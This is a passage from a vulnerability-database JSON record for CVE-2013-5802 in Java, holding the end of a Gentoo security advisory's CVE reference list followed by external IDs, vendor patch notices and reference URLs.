http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487\n[ 84 ] CVE-2013-1488\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488\n[ 85 ] CVE-2013-1491\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491\n[ 86 ] CVE-2013-1493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493\n[ 87 ] CVE-2013-1500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500\n[ 88 ] CVE-2013-1518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518\n[ 89 ] CVE-2013-1537\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537\n[ 90 ] CVE-2013-1540\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540\n[ 91 ] CVE-2013-1557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557\n[ 92 ] CVE-2013-1558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558\n[ 93 ] CVE-2013-1561\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561\n[ 94 ] CVE-2013-1563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563\n[ 95 ] CVE-2013-1564\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564\n[ 96 ] CVE-2013-1569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569\n[ 97 ] CVE-2013-1571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571\n[ 98 ] CVE-2013-2383\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383\n[ 99 ] CVE-2013-2384\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384\n[ 100 ] CVE-2013-2394\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394\n[ 101 ] CVE-2013-2400\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400\n[ 102 ] CVE-2013-2407\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407\n[ 103 ] CVE-2013-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412\n[ 104 ] CVE-2013-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414\n[ 105 ] CVE-2013-2415\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415\n[ 106 ] CVE-2013-2416\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416\n[ 107 ] CVE-2013-2417\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417\n[ 108 ] CVE-2013-2418\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418\n[ 109 ] CVE-2013-2419\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419\n[ 110 ] CVE-2013-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420\n[ 111 ] CVE-2013-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421\n[ 112 ] CVE-2013-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422\n[ 113 ] CVE-2013-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423\n[ 114 ] CVE-2013-2424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424\n[ 115 ] CVE-2013-2425\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425\n[ 116 ] CVE-2013-2426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426\n[ 117 ] CVE-2013-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427\n[ 118 ] CVE-2013-2428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428\n[ 119 ] CVE-2013-2429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429\n[ 120 ] CVE-2013-2430\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430\n[ 121 ] CVE-2013-2431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431\n[ 122 ] CVE-2013-2432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432\n[ 123 ] CVE-2013-2433\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433\n[ 124 ] CVE-2013-2434\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434\n[ 125 ] CVE-2013-2435\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435\n[ 126 ] CVE-2013-2436\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436\n[ 127 ] CVE-2013-2437\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437\n[ 128 ] CVE-2013-2438\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438\n[ 129 ] CVE-2013-2439\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439\n[ 130 ] CVE-2013-2440\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440\n[ 131 ] CVE-2013-2442\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442\n[ 132 ] CVE-2013-2443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443\n[ 133 ] CVE-2013-2444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444\n[ 134 ] CVE-2013-2445\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445\n[ 135 ] CVE-2013-2446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446\n[ 136 ] CVE-2013-2447\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447\n[ 137 ] CVE-2013-2448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448\n[ 138 ] CVE-2013-2449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449\n[ 139 ] CVE-2013-2450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450\n[ 140 ] CVE-2013-2451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451\n[ 141 ] CVE-2013-2452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452\n[ 142 ] CVE-2013-2453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453\n[ 143 ] CVE-2013-2454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454\n[ 144 ] CVE-2013-2455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455\n[ 145 ] CVE-2013-2456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456\n[ 146 ] CVE-2013-2457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457\n[ 147 ] CVE-2013-2458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458\n[ 148 ] CVE-2013-2459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459\n[ 149 ] CVE-2013-2460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460\n[ 150 ] CVE-2013-2461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461\n[ 151 ] CVE-2013-2462\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462\n[ 152 ] CVE-2013-2463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463\n[ 153 ] CVE-2013-2464\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464\n[ 154 ] CVE-2013-2465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465\n[ 155 ] CVE-2013-2466\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466\n[ 156 ] CVE-2013-2467\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467\n[ 157 ] CVE-2013-2468\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468\n[ 158 ] CVE-2013-2469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469\n[ 159 ] CVE-2013-2470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470\n[ 160 ] CVE-2013-2471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471\n[ 161 ] CVE-2013-2472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472\n[ 162 ] CVE-2013-2473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473\n[ 163 ] CVE-2013-3743\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743\n[ 164 ] CVE-2013-3744\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744\n[ 165 ] CVE-2013-3829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829\n[ 166 ] CVE-2013-5772\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772\n[ 167 ] CVE-2013-5774\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774\n[ 168 ] CVE-2013-5775\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775\n[ 169 ] CVE-2013-5776\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776\n[ 170 ] CVE-2013-5777\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777\n[ 171 ] CVE-2013-5778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778\n[ 172 ] CVE-2013-5780\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780\n[ 173 ] CVE-2013-5782\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782\n[ 174 ] CVE-2013-5783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783\n[ 175 ] CVE-2013-5784\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784\n[ 176 ] CVE-2013-5787\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787\n[ 177 ] CVE-2013-5788\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788\n[ 178 ] CVE-2013-5789\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789\n[ 179 ] CVE-2013-5790\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790\n[ 180 ] CVE-2013-5797\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797\n[ 181 ] CVE-2013-5800\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800\n[ 182 ] CVE-2013-5801\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801\n[ 183 ] CVE-2013-5802\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802\n[ 184 ] CVE-2013-5803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803\n[ 185 ] CVE-2013-5804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804\n[ 186 ] CVE-2013-5805\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805\n[ 187 ] CVE-2013-5806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806\n[ 188 ] CVE-2013-5809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809\n[ 189 ] CVE-2013-5810\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810\n[ 190 ] CVE-2013-5812\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812\n[ 191 ] CVE-2013-5814\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814\n[ 192 ] CVE-2013-5817\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817\n[ 193 ] CVE-2013-5818\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818\n[ 194 ] CVE-2013-5819\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819\n[ 195 ] CVE-2013-5820\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820\n[ 196 ] CVE-2013-5823\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823\n[ 197 ] CVE-2013-5824\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824\n[ 198 ] CVE-2013-5825\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825\n[ 199 ] CVE-2013-5829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829\n[ 200 ] CVE-2013-5830\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830\n[ 201 ] CVE-2013-5831\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831\n[ 202 ] CVE-2013-5832\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832\n[ 203 ] CVE-2013-5838\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838\n[ 204 ] CVE-2013-5840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840\n[ 205 ] CVE-2013-5842\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842\n[ 206 ] CVE-2013-5843\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843\n[ 207 ] CVE-2013-5844\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844\n[ 208 ] CVE-2013-5846\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846\n[ 209 ] CVE-2013-5848\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848\n[ 210 ] CVE-2013-5849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849\n[ 211 ] CVE-2013-5850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850\n[ 212 ] CVE-2013-5851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851\n[ 213 ] CVE-2013-5852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852\n[ 214 ] CVE-2013-5854\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854\n[ 215 ] CVE-2013-5870\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870\n[ 216 ] CVE-2013-5878\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878\n[ 217 ] CVE-2013-5887\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887\n[ 218 ] CVE-2013-5888\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888\n[ 219 ] CVE-2013-5889\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889\n[ 220 ] CVE-2013-5893\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893\n[ 221 ] CVE-2013-5895\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895\n[ 222 ] CVE-2013-5896\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896\n[ 223 ] CVE-2013-5898\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898\n[ 224 ] CVE-2013-5899\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899\n[ 225 ] CVE-2013-5902\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902\n[ 226 ] CVE-2013-5904\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904\n[ 227 ] CVE-2013-5905\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905\n[ 228 ] CVE-2013-5906\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906\n[ 229 ] CVE-2013-5907\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907\n[ 230 ] CVE-2013-5910\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910\n[ 231 ] CVE-2014-0368\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368\n[ 232 ] CVE-2014-0373\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373\n[ 233 ] CVE-2014-0375\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375\n[ 234 ] CVE-2014-0376\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376\n[ 235 ] CVE-2014-0382\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382\n[ 236 ] CVE-2014-0385\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385\n[ 237 ] CVE-2014-0387\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387\n[ 238 ] CVE-2014-0403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403\n[ 239 ] CVE-2014-0408\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408\n[ 240 ] CVE-2014-0410\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410\n[ 241 ] CVE-2014-0411\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411\n[ 242 ] CVE-2014-0415\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415\n[ 243 ] CVE-2014-0416\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416\n[ 244 ] CVE-2014-0417\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417\n[ 245 ] CVE-2014-0418\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418\n[ 246 ] CVE-2014-0422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422\n[ 247 ] CVE-2014-0423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423\n[ 248 ] CVE-2014-0424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424\n[ 249 ] CVE-2014-0428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201401-30.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. (CVE-2013-5803)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website", "sources": [ { "db": "NVD", "id": "CVE-2013-5802" }, { "db": "BID", "id": "63135" }, { "db": "VULMON", "id": "CVE-2013-5802" }, { "db": "PACKETSTORM", "id": "124303" }, { "db": "PACKETSTORM", "id": "124071" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "124943" }, { "db": "PACKETSTORM", "id": "123722" } ], "trust": 1.98 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-5802", "trust": 2.8 }, { "db": "BID", "id": "63135", "trust": 2.0 }, { "db": "HITACHI", "id": "HS13-025", "trust": 2.0 }, { "db": "SECUNIA", "id": "56338", "trust": 1.7 }, { "db": "AUSCERT", "id": "ESB-2020.3130", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201310-380", "trust": 0.6 }, { "db": "MCAFEE", "id": "SB10058", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-213-02", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2013-5802", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "124303", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "124071", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127267", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123649", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126195", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123921", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "124943", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123722", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5802" }, { "db": "BID", "id": "63135" }, { "db": "PACKETSTORM", "id": "124303" }, { "db": "PACKETSTORM", "id": "124071" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "124943" }, { "db": "PACKETSTORM", "id": "123722" }, { "db": "CNNVD", "id": "CNNVD-201310-380" }, { "db": "NVD", "id": "CVE-2013-5802" } ] }, "id": "VAR-201310-0612", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 1.0 }, "last_update_date": "2024-07-23T19:54:42.029000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Oracle Java SE/JRockit/Java SE Embedded JAXP Fixes for component security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=128143" }, { "title": "Red Hat: CVE-2013-5802", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2013-5802" }, { "title": "Red Hat: Important: java-1.6.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131505 - security advisory" }, { "title": "Red Hat: Important: java-1.5.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131509 - security advisory" }, { "title": "Red Hat: Important: java-1.7.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131447 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131451 - security advisory" }, { "title": "Red Hat: Critical: java-1.6.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131508 - security advisory" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131793 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131507 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-oracle security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131440 - security advisory" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2033-1" }, { "title": "Amazon Linux AMI: ALAS-2013-246", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-246" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2089-1" }, { "title": "Amazon Linux AMI: ALAS-2013-235", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-235" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5802" }, { "db": "CNNVD", "id": "CNNVD-201310-380" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2013-5802" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html" }, { "trust": 2.0, "url": "http://support.apple.com/kb/ht5982" }, { "trust": 2.0, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs13-025/index.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21655201" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2013-1505.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1451.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1793.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/63135" }, { "trust": 1.8, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1440.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1447.html" }, { "trust": 1.7, "url": "http://lists.apple.com/archives/security-announce/2013/oct/msg00001.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-updates/2013-11/msg00023.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00010.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1507.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00013.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1508.html" }, { "trust": 1.7, "url": "http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=1019130" }, { "trust": 1.7, "url": "http://www.ubuntu.com/usn/usn-2033-1" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1509.html" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=138674073720143\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=138674031212883\u0026w=2" }, { "trust": 1.7, "url": "http://secunia.com/advisories/56338" }, { "trust": 1.7, "url": "http://www.ubuntu.com/usn/usn-2089-1" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19207" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.3130/" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5814" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5802" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5820" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5804" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5772" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5778" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5782" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5797" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5809" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5817" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5803" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5774" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3829" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5780" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5783" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5784" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5823" }, { "trust": 0.4, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5817.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5797.html" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5782.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5802.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5803.html" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5778.html" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5823.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5783.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5780.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5850.html" }, { 